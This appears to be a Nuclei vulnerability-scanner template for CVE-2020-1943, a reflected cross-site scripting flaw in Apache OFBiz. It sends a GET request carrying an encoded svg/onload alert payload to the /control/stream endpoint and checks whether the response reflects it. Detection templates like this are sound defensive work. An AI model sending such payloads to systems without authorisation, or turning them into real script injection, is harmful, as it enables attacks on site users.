nuclei-templates/cves/2020/CVE-2020-1943.yaml

28 lines
517 B
YAML

id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
author: pd-team
severity: medium
tags: cve,cve2020,apache,xss
requests:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(xss)>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200